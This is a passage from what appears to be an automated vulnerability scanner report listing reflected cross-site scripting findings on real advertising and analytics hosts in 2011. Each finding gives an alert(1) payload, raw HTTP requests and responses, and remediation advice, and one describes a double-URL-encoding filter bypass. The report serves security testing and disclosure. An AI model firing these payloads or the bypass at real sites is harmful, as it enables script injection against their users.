Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 906f3'-alert(1)-'8a5c815ddd2 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3e33'-alert(1)-'9eac11f134b was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 379d8<script>alert(1)</script>9352c1ee60b was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 00:52:04 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "2083767379d8<script>alert(1)</script>9352c1ee60b"
The value of the placementId request parameter is copied into an HTML comment. The payload cb6e8--><script>alert(1)</script>c9166046b4e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1500495cb6e8--><script>alert(1)</script>c9166046b4e" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 92fce--><script>alert(1)</script>3d86a354bdc was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-192fce--><script>alert(1)</script>3d86a354bdc" -->
...[SNIP]...
4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b778"-alert(1)-"c081c9a4e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=2475049&2b778"-alert(1)-"c081c9a4e0=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:12:19 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT Pragma: no-cache Content-Length: 4667 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?2b778"-alert(1)-"c081c9a4e0=1&Z=1x1&s=2475049&_salt=2441704624";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array ...[SNIP]...
4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960fe"><script>alert(1)</script>af24f5e639e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=2475049&960fe"><script>alert(1)</script>af24f5e639e=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:12:19 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT Pragma: no-cache Content-Length: 4712 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... <a href="http://ads.bluelithium.com/imageclick?960fe"><script>alert(1)</script>af24f5e639e=1&Z=1x1&s=2475049&_salt=983545231&t=2" target="_parent"> ...[SNIP]...
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 7b4c8<script>alert(1)</script>7900287ce39 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 00:49:31 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "10397677b4c8<script>alert(1)</script>7900287ce39"
The value of the placementId request parameter is copied into an HTML comment. The payload 1c8c0--><script>alert(1)</script>d8f33500b41 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "14593081c8c0--><script>alert(1)</script>d8f33500b41" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 4ea7c--><script>alert(1)</script>2eed884a416 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-14ea7c--><script>alert(1)</script>2eed884a416" -->
The value of the ad_creative_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba94d'%3balert(1)//bdd52ed5568 was submitted in the ad_creative_id parameter. This input was echoed as ba94d';alert(1)//bdd52ed5568 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ad_referral_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bfe2'%3balert(1)//712e3a0ece8 was submitted in the ad_referral_url parameter. This input was echoed as 5bfe2';alert(1)//712e3a0ece8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the color_bg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c0f"><script>alert(1)</script>584e56fd634 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_bg request parameter is copied into the HTML document as plain text between tags. The payload 235f2<script>alert(1)</script>4125eaa7b51 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_border request parameter is copied into the HTML document as plain text between tags. The payload aa51b<script>alert(1)</script>c93f4630dc4 was submitted in the color_border parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_link request parameter is copied into the HTML document as plain text between tags. The payload 76dc4<script>alert(1)</script>e5a3998eb1c was submitted in the color_link parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_text_normal request parameter is copied into the HTML document as plain text between tags. The payload 86a95<script>alert(1)</script>6511ba6bdbc was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_text_normal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3c7"><script>alert(1)</script>9ace1e3c9ad was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_text_title request parameter is copied into the HTML document as plain text between tags. The payload 835d5<script>alert(1)</script>6102431f71c was submitted in the color_text_title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the default_league request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 688d1'%3balert(1)//add2da0c4a4 was submitted in the default_league parameter. This input was echoed as 688d1';alert(1)//add2da0c4a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the default_team request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82a46'%3balert(1)//40d577401fd was submitted in the default_team parameter. This input was echoed as 82a46';alert(1)//40d577401fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload b2604<script>alert(1)</script>e25fa51e76a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7be4b<a>cfdf0815b78 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8df99<script>alert(1)</script>8a03bb991cc was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 00:55:06 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 41452<script>alert(1)</script>b5bc8226dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=741452<script>alert(1)</script>b5bc8226dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:02 GMT Date: Sat, 17 Sep 2011 00:52:02 GMT Content-Length: 1235 Connection: close
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 66a83<script>alert(1)</script>803fdeef77b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 961ba<script>alert(1)</script>5ef4d07457b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=961ba<script>alert(1)</script>5ef4d07457b&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:09 GMT Date: Sat, 17 Sep 2011 00:52:09 GMT Content-Length: 1235 Connection: close
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3d1ac<script>alert(1)</script>969635bd65a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=59648883d1ac<script>alert(1)</script>969635bd65a&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:03 GMT Date: Sat, 17 Sep 2011 00:52:03 GMT Content-Length: 1235 Connection: close
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload dcffa<script>alert(1)</script>16a4cf57524 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2dcffa<script>alert(1)</script>16a4cf57524&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:05 GMT Date: Sat, 17 Sep 2011 00:52:05 GMT Content-Length: 1235 Connection: close
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d68d4<script>alert(1)</script>a87e6bee52c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=d68d4<script>alert(1)</script>a87e6bee52c&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:06 GMT Date: Sat, 17 Sep 2011 00:52:06 GMT Content-Length: 1235 Connection: close
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload e7599<script>alert(1)</script>52183d27ea7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=e7599<script>alert(1)</script>52183d27ea7&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:07 GMT Date: Sat, 17 Sep 2011 00:52:07 GMT Content-Length: 1235 Connection: close
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4342b<script>alert(1)</script>a0dd5801e26 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=4342b<script>alert(1)</script>a0dd5801e26&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:08 GMT Date: Sat, 17 Sep 2011 00:52:08 GMT Content-Length: 1235 Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c73"><script>alert(1)</script>e1b769851e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:41:26 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 380 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335ab"><script>alert(1)</script>facc901f053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:41:40 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 463 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32bc8"><script>alert(1)</script>895c80335e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:41:54 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 463 Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71dff"><script>alert(1)</script>b41d32a101b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:42:08 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 372 Content-Type: text/html
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bf9</script><script>alert(1)</script>cc94f26ced5 was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 431a4"><script>alert(1)</script>498ee9cb580 was submitted in the companion parameter. This input was echoed as 431a4\"><script>alert(1)</script>498ee9cb580 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 was submitted in the page parameter. This input was echoed as 4cfbf';alert(1)//04fb34becb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e2b"><script>alert(1)</script>d1318e1e89 was submitted in the page parameter. This input was echoed as 97e2b\"><script>alert(1)</script>d1318e1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cb2a</script><script>alert(1)</script>60f4c826daf was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a42"><script>alert(1)</script>f1bf5dd16e2 was submitted in the position parameter. This input was echoed as 29a42\"><script>alert(1)</script>f1bf5dd16e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a4d93<script>alert(1)</script>c705977927c was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8eb5"><script>alert(1)</script>ac50390d5f8 was submitted in the companion parameter. This input was echoed as b8eb5\"><script>alert(1)</script>ac50390d5f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 492df</script><script>alert(1)</script>3d2d1682c3d was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1c0"><script>alert(1)</script>6c55ca82c3b was submitted in the page parameter. This input was echoed as 6c1c0\"><script>alert(1)</script>6c55ca82c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 was submitted in the page parameter. This input was echoed as 8bca3';alert(1)//54aa045dd55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9a4"><script>alert(1)</script>5a6cecf4080 was submitted in the position parameter. This input was echoed as 4d9a4\"><script>alert(1)</script>5a6cecf4080 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ffc</script><script>alert(1)</script>2d13a9c6857 was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b357<script>alert(1)</script>dcde2ff62ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.
